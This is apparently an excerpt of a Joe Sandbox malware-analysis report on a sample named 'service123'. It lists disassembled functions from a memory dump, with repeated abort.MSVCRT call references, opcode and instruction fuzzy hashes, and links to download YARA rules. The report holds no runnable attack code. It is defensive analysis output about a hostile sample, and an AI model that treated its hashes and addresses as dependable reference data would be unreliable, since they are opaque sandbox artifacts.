abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: caff15e3d10213e6232e66149d6fc50781e7493c42e695783fd2cb4c67cf8b0b
Instruction ID: 098c9c08f01ca63ab0478d3b503c1871d94b3e60d0849137bae1e588027a6b2c
Opcode Fuzzy Hash: caff15e3d10213e6232e66149d6fc50781e7493c42e695783fd2cb4c67cf8b0b
Instruction Fuzzy Hash: 170119B2642201CBE744FF18D491B5AB7B0FB1234DF009A58D5859BB05D735E828CF91

Function 6C2B2A6E Relevance: 42.1, APIs: 28, Instructions: 71COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C386CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 8139c33f1b2bc51922507cf1b2c34faec73f708a11b8df5c297604234a09bb45
Instruction ID: cfc12f65ceb31412cdcf045f70cac7d479e51cc247cf549b43fc061f59fb3e71
Opcode Fuzzy Hash: 8139c33f1b2bc51922507cf1b2c34faec73f708a11b8df5c297604234a09bb45
Instruction Fuzzy Hash: 8A0137B2642201CBE744FF18D491B6AB7B0FF1234CF009A48C894ABB05D735E428CF91

Function 6C2B2B13 Relevance: 42.1, APIs: 28, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C386CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 84c0d7219bb8f67e8b16e06adda3f6efa133337faa245da4e699ded423c1d335
Instruction ID: f45c6a8138940674c1a99731ba80873abb408bae26f8b82ea71ce3687521f248
Opcode Fuzzy Hash: 84c0d7219bb8f67e8b16e06adda3f6efa133337faa245da4e699ded423c1d335
Instruction Fuzzy Hash: D3F044B2606205CBD744EF18D490B6AB7B1FF0234CF009A48C884ABB06D735E428CF92

Function 6C2B2AAD Relevance: 42.1, APIs: 28, Instructions: 65COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C386CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 086fc99bd105b466e7647a87d8e65b9285716fdbad8d529b1a8ca36f01af7895
Instruction ID: 2a9174fa71ea749f21fb3b823d7c4a941759d1bf617a90009608895d6dbfe8c8
Opcode Fuzzy Hash: 086fc99bd105b466e7647a87d8e65b9285716fdbad8d529b1a8ca36f01af7895
Instruction Fuzzy Hash: 69F03AB1516205CBDB44EF19C490B6AB771FF0234CF019A58C855ABB06D735E428CF92

Function 6C2BB930 Relevance: 40.6, APIs: 27, Instructions: 135COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: b883b64fa34b897f1f29c43acaa3d5aebe2dca68144f6f6290c8e0a4ed7d0b5f
Instruction ID: 1a64717c715cd539eb818a331074b680a6fdd345645bef876738d9c4cc5f1cc9
Opcode Fuzzy Hash: b883b64fa34b897f1f29c43acaa3d5aebe2dca68144f6f6290c8e0a4ed7d0b5f
Instruction Fuzzy Hash: 7E310431609B0D9FC700DE59C4C1796B3F5EB89399F40892AEEA4A7B41D334A854DF51

Function 6C2BBFCC Relevance: 39.1, APIs: 26, Instructions: 63COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction ID: 20f51e9776cab07c064adfcb9512853bdab97652bdf238f305dd4b4d543dd007
Opcode Fuzzy Hash: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction Fuzzy Hash: 70F027316ED02FCF8B003B1D44508A17337BA9778EB9D4841EC807BE18C2719403CA52

Function 6C2BBEE7 Relevance: 37.6, APIs: 25, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9286eddbd882d755aefa7afc658ad000226db698191bf4070122da5d43ee6a9
Instruction ID: fdfa954a3cda8f3c2e2cde462b6629ef79e20205ad8b4a16af8d3f628c1431ea
Opcode Fuzzy Hash: b9286eddbd882d755aefa7afc658ad000226db698191bf4070122da5d43ee6a9
Instruction Fuzzy Hash: FA019073A15A2F07E7104E75C8E1361B6929F8335CF09C769ED7637E8AC234A808EB40

Function 6C2BBC1B Relevance: 37.6, APIs: 25, Instructions: 55COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
